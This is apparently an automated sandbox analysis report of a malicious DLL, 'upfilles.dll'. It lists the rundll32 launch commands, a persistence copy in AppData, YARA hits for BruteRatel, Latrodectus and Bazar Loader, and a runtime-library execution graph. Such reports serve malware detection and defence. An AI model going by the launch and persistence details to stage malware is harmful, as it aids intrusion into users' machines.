                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:18
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:20
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:21
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:22
                                                                                                                    Start time:00:04:16
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:26
                                                                                                                    Start time:00:04:29
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:27
                                                                                                                    Start time:00:04:37
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:225
                                                                                                                      Total number of Limit Nodes:13
                                                                                                                      execution_graph 15659 1800151f8 15660 180015211 15659->15660 15661 18001520d 15659->15661 15671 18001a0b8 15660->15671 15666 180015223 15669 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15666->15669 15669->15661 15670 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15670->15666 15672 180015216 15671->15672 15673 18001a0c5 15671->15673 15677 18001a598 GetEnvironmentStringsW 15672->15677 15706 180016a50 15673->15706 15678 18001a5c6 15677->15678 15688 18001a668 15677->15688 15681 18001a500 WideCharToMultiByte 15678->15681 15679 18001a672 FreeEnvironmentStringsW 15680 18001521b 15679->15680 15680->15666 15689 180015264 15680->15689 15682 18001a618 15681->15682 15683 180016c64 _onexit 15 API calls 15682->15683 15682->15688 15684 18001a627 15683->15684 15685 18001a500 WideCharToMultiByte 15684->15685 15686 18001a651 15684->15686 15685->15686 15687 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15686->15687 15687->15688 15688->15679 15688->15680 15690 18001528b 15689->15690 15691 180018d1c _set_errno_from_matherr 14 API calls 15690->15691 15702 1800152c0 15691->15702 15692 18001532f 15693 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15692->15693 15694 180015230 15693->15694 15694->15670 15695 180018d1c _set_errno_from_matherr 14 API calls 15695->15702 15696 180015320 15697 18001536c 14 API calls 15696->15697 15699 180015328 15697->15699 15698 180015ad0 __std_exception_copy 23 API calls 15698->15702 15700 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15699->15700 15700->15692 15701 180015357 15703 180011b1c _invalid_parameter_noinfo_noreturn 9 API calls 15701->15703 15702->15692 15702->15695 15702->15696 15702->15698 15702->15701 15704 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15702->15704 15705 180015369 15703->15705 15704->15702 15707 180016a61 15706->15707 15708 180016a66 15706->15708 15710 18001a990 _set_errno_from_matherr 6 API calls 15707->15710 15709 18001a9d8 _set_errno_from_matherr 6 API calls 15708->15709 15714 180016a6e 15708->15714 15711 180016a85 15709->15711 15710->15708 15712 180018d1c _set_errno_from_matherr 14 API calls 15711->15712 15711->15714 15715 180016a98 15712->15715 15713 180015a78 _purecall 26 API calls 15716 180016af6 15713->15716 15714->15713 15719 180016ae8 15714->15719 15717 180016ab6 15715->15717 15718 180016aa6 15715->15718 15721 18001a9d8 _set_errno_from_matherr 6 API calls 15717->15721 15720 18001a9d8 _set_errno_from_matherr 6 API calls 15718->15720 15731 180019e3c 15719->15731 15728 180016aad 15720->15728 15722 180016abe 15721->15722 15723 180016ac2 15722->15723 15724 180016ad4 15722->15724 15725 18001a9d8 _set_errno_from_matherr 6 API calls 15723->15725 15726 1800166e8 _set_errno_from_matherr 14 API calls 15724->15726 15725->15728 15729 180016adc 15726->15729 15727 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15727->15714 15728->15727 15730 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15729->15730 15730->15714 15749 18001a000 15731->15749 15733 180019e65 15764 180019b48 15733->15764 15736 180019e7f 15736->15672 15737 180016c64 _onexit 15 API calls 15739 180019e90 15737->15739 15738 180019f2b 15740 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15738->15740 15739->15738 15771 18001a134 15739->15771 15740->15736 15742 180019f1f 15743 180019f26 15742->15743 15746 180019f4b 15742->15746 15744 180011c1c _set_errno_from_matherr 14 API calls 15743->15744 15744->15738 15745 180019f88 15745->15738 15780 18001998c 15745->15780 15746->15745 15747 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 15746->15747 15747->15745 15750 18001a023 15749->15750 15753 18001a02d 15750->15753 15795 180018c70 EnterCriticalSection 15750->15795 15754 18001a09f 15753->15754 15755 180015a78 _purecall 26 API calls 15753->15755 15754->15733 15757 18001a0b7 15755->15757 15759 18001a10a 15757->15759 15761 180016a50 26 API calls 15757->15761 15759->15733 15762 18001a0f4 15761->15762 15763 180019e3c 36 API calls 15762->15763 15763->15759 15765 180012670 26 API calls 15764->15765 15766 180019b5c 15765->15766 15767 180019b68 GetOEMCP 15766->15767 15768 180019b7a 15766->15768 15770 180019b8f 15767->15770 15769 180019b7f GetACP 15768->15769 15768->15770 15769->15770 15770->15736 15770->15737 15772 180019b48 28 API calls 15771->15772 15773 18001a15f 15772->15773 15774 18001a19c IsValidCodePage 15773->15774 15777 18001a1df __FrameHandler3::UnwindNestedFrames memcpy_s 15773->15777 15775 18001a1ad 15774->15775 15774->15777 15776 18001a1e4 GetCPInfo 15775->15776 15779 18001a1b6 memcpy_s 15775->15779 15776->15777 15776->15779 15777->15742 15796 180019c58 15779->15796 15805 180018c70 EnterCriticalSection 15780->15805 15797 180019c95 GetCPInfo 15796->15797 15804 180019d8d __FrameHandler3::UnwindNestedFrames 15796->15804 15800 180019ca8 15797->15800 15797->15804 15798 18001db44 29 API calls 15799 180019d21 15798->15799 15801 18001bc48 30 API calls 15799->15801 15800->15798 15802 180019d54 15801->15802 15803 18001bc48 30 API calls 15802->15803 15803->15804 15804->15777 12957 180001000 InitializeCriticalSectionEx 12958 180001079 12957->12958 12959 18000106f GetLastError 12957->12959 12962 18000de28 12958->12962 12959->12958 12961 18000de81 12963 18000de57 12962->12963 12965 18000de4d _onexit 12962->12965 12966 1800157dc 12963->12966 12965->12961 12969 180015428 12966->12969 12976 180018c70 EnterCriticalSection 12969->12976 13043 180002400 13044 180002409 13043->13044 13045 18000240e 13044->13045 13050 18000d8d4 13044->13050 13048 180005539 13056 18000d5ec 13050->13056 13053 180007a40 InitializeCriticalSectionEx 13054 180007a62 GetLastError 13053->13054 13055 180007a6e 13053->13055 13054->13055 13055->13048 13057 18000d5f7 13056->13057 13058 1800054bd 13057->13058 13061 18000d616 13057->13061 13065 180014998 13057->13065 13058->13048 13058->13053 13060 18000d621 13072 18000e43c 13060->13072 13061->13060 13068 18000e41c 13061->13068 13076 1800149c8 13065->13076 13069 18000e42a std::bad_alloc::bad_alloc 13068->13069 13070 18000eb58 _CxxThrowException 2 API calls 13069->13070 13071 18000e43b 13070->13071 13073 18000e44a std::bad_alloc::bad_alloc 13072->13073 13074 18000eb58 _CxxThrowException 2 API calls 13073->13074 13075 18000e45b 13074->13075 13081 180018c70 EnterCriticalSection 13076->13081 14087 1800184a0 14088 1800184ab __scrt_uninitialize_crt 14087->14088 14096 18001d718 14088->14096 14109 180018c70 EnterCriticalSection 14096->14109 14110 1800110a1 14122 180010fcb __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 14110->14122 14111 1800110c8 14127 18000fc8c 14111->14127 14113 180011103 14133 1800149fc 14113->14133 14116 18000f130 35 API calls IsInExceptionSpec 14116->14122 14117 18000fc8c __InternalCxxFrameHandler 35 API calls 14119 1800110d8 14117->14119 14118 1800110e5 __FrameHandler3::GetHandlerSearchState 14119->14118 14120 1800149fc IsInExceptionSpec 26 API calls 14119->14120 14121 18001110e 14120->14121 14122->14111 14122->14113 14122->14116 14124 18000f158 14122->14124 14125 18000fc8c __InternalCxxFrameHandler 35 API calls 14124->14125 14126 18000f166 14125->14126 14126->14122 14141 18000fca8 14127->14141 14130 18000fc9a 14130->14117 14130->14119 14131 180015a78 _purecall 26 API calls 14132 18000fca4 14131->14132 14134 18001697c IsInExceptionSpec 26 API calls 14133->14134 14135 180014a05 14134->14135 14136 180015a78 _purecall 26 API calls 14135->14136 14137 180014a1b 14136->14137 14138 180014a25 14137->14138 14139 180016af8 _set_errno_from_matherr 14 API calls 14137->14139 14138->14119 14140 180014a4e 14139->14140 14140->14119 14142 18000fcc7 GetLastError 14141->14142 14143 18000fc95 14141->14143 14153 180011694 14142->14153 14143->14130 14143->14131 14157 18001142c 14153->14157 14158 18001148d TlsGetValue 14157->14158 14164 180011488 try_get_function 14157->14164 14159 180011570 14159->14158 14162 18001157e GetProcAddress 14159->14162 14160 1800114bc LoadLibraryExW 14161 1800114dd GetLastError 14160->14161 14160->14164 14161->14164 14163 18001158f 14162->14163 14163->14158 14164->14158 14164->14159 14164->14160 14165 180011555 FreeLibrary 14164->14165 14166 180011517 LoadLibraryExW 14164->14166 14165->14164 14166->14164 15118 1800185a8 15121 18001852c 15118->15121 15128 180018c70 EnterCriticalSection 15121->15128 16306 1800167b8 16307 1800167d2 16306->16307 16308 1800167bd 16306->16308 16312 1800167d8 16308->16312 16313 180016822 16312->16313 16314 18001681a 16312->16314 16316 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16313->16316 16315 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16314->16315 16315->16313 16317 18001682f 16316->16317 16318 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16317->16318 16319 18001683c 16318->16319 16320 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16319->16320 16321 180016849 16320->16321 16322 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16321->16322 16323 180016856 16322->16323 16324 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16323->16324 16325 180016863 16324->16325 16326 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16325->16326 16327 180016870 16326->16327 16328 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16327->16328 16329 18001687d 16328->16329 16330 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16329->16330 16331 18001688d 16330->16331 16332 180016c24 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 16331->16332 16333 18001689d 16332->16333 16338 180016688 16333->16338 16352 180018c70 EnterCriticalSection 16338->16352 16451 18000dbd4 16453 18000dbdd __scrt_initialize_onexit_tables 16451->16453 16452 18000dbf1 16453->16452 16456 180015464 16453->16456 16463 180018c70 EnterCriticalSection 16456->16463

                                                                                                                      Executed Functions

                                                                                                                      Function 000000018000DE90 Relevance: 21.2, APIs: 14, Instructions: 235COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 18000de90-18000de96 1 18000ded1-18000dedb 0->1 2 18000de98-18000de9b 0->2 3 18000dffc-18000e018 1->3 4 18000dec5-18000defd call 18000dc18 2->4 5 18000de9d-18000dea0 2->5 9 18000e01a 3->9 10 18000e02c-18000e047 call 18000daac 3->10 18 18000df02-18000df04 4->18 7 18000dea2-18000dea5 5->7 8 18000deb8 __scrt_dllmain_crt_thread_attach 5->8 13 18000deb1-18000deb6 call 18000db5c 7->13 14 18000dea7-18000deb0 7->14 11 18000debd-18000dec4 8->11 15 18000e01c-18000e02b 9->15 20 18000e049-18000e07c __scrt_dllmain_uninitialize_c call 18000e678 call 18000e6ec call 18000dc04 call 18000ddd8 call 18000ddfc 10->20 21 18000e07e-18000e0b0 call 18000e470 10->21 13->11 22 18000df06 18->22 23 18000df1e-18000df33 call 18000daac 18->23 20->15 35 18000e0c1-18000e0c7 21->35 36 18000e0b2-18000e0b8 21->36 26 18000df08-18000df1d 22->26 33 18000df39-18000df4a call 18000db1c 23->33 34 18000dfed-18000dffb call 18000e470 23->34 53 18000df9b-18000dfa5 call 18000ddd8 33->53 54 18000df4c-18000df70 call 18000e6b0 call 18000e668 call 18000e68c call 180015a38 33->54 34->3 38 18000e0c9-18000e0d3 35->38 39 18000e10e-18000e124 call 18000af30 35->39 36->35 37 18000e0ba-18000e0bc 36->37 43 18000e1b1-18000e1be 37->43 44 18000e0d5-18000e0dd 38->44 45 18000e0df-18000e0ed 38->45 59 18000e126-18000e128 39->59 60 18000e15e-18000e160 39->60 50 18000e0f3-18000e0fb call 18000de90 44->50 45->50 65 18000e1a7-18000e1af 45->65 66 18000e100-18000e108 50->66 53->22 75 18000dfab-18000dfb7 call 18000e6a8 53->75 54->53 98 18000df72-18000df79 __scrt_dllmain_after_initialize_c 54->98 59->60 68 18000e12a-18000e14e call 18000af30 call 18000de90 59->68 63 18000e162-18000e165 60->63 64 18000e167-18000e17c call 18000de90 60->64 63->64 63->65 64->65 84 18000e17e-18000e188 64->84 65->43 66->39 66->65 68->60 91 18000e150-18000e155 68->91 86 18000dfb9-18000dfc3 call 18000dd3c 75->86 87 18000dfdd-18000dfe8 75->87 89 18000e193-18000e1a3 84->89 90 18000e18a-18000e191 84->90 86->87 97 18000dfc5-18000dfd3 86->97 87->26 89->65 90->65 91->60 97->87 98->53 99 18000df7b-18000df98 call 1800159d4 98->99 99->53
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_dllmain_uninitialize_c__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 747939005-0
                                                                                                                      • Opcode ID: d7a072687d834e50c2146167156290bc02a786a46f41c0fae8196e1fdd9393dd
                                                                                                                      • Instruction ID: f1d8c7e15b6d0e8eee91dc52fcbb3e9c46995225e7eb304dce92d09e8cc04b6c
                                                                                                                      • Opcode Fuzzy Hash: d7a072687d834e50c2146167156290bc02a786a46f41c0fae8196e1fdd9393dd
                                                                                                                      • Instruction Fuzzy Hash: B791123161428D86FAD3EB66A8813EA77D1AB8E7C0F44C026BA4557796DF38CB4D8310
                                                                                                                      Function 000000018000DC18 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 102 18000dc18-18000dc41 call 18000e200 call 18000fb2c 107 18000dc43-18000dc45 102->107 108 18000dc47 call 180015954 102->108 109 18000dc5b-18000dc60 107->109 111 18000dc4c-18000dc4e 108->111 112 18000dc59 111->112 113 18000dc50-18000dc57 call 18000fb88 111->113 112->109 113->107
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 722566019-0
                                                                                                                      • Opcode ID: 91b077c6b03f44861365230ed74371ec9b6e332527939ceb5f78727b5766cd1f
                                                                                                                      • Instruction ID: 37a4a6329ced6371a2a66ea28f6e1e4b09dc9fd3b3f75e0e34c4a6cc3791f04e
                                                                                                                      • Opcode Fuzzy Hash: 91b077c6b03f44861365230ed74371ec9b6e332527939ceb5f78727b5766cd1f
                                                                                                                      • Instruction Fuzzy Hash: 08E0DF3020528D81FEEBA67124227F93B800B5E3C0F00D09AB899422C3CE49478EEB30
                                                                                                                      Function 000000018001DDCC Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 116 18001ddcc-18001dde9 117 18001de14-18001de21 call 180018c70 116->117 118 18001ddeb-18001ddfc call 180011c1c call 180011acc 116->118 124 18001de27-18001de2e 117->124 129 18001ddfe-18001de13 118->129 126 18001de66-18001de72 call 180018cc4 124->126 127 18001de30-18001de3b 124->127 126->129 130 18001de3d 127->130 131 18001de3f call 18001dcd4 127->131 134 18001de61-18001de64 130->134 135 18001de44-18001de4b 131->135 134->124 136 18001de52-18001de5b 135->136 137 18001de4d-18001de50 135->137 136->134 137->126
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
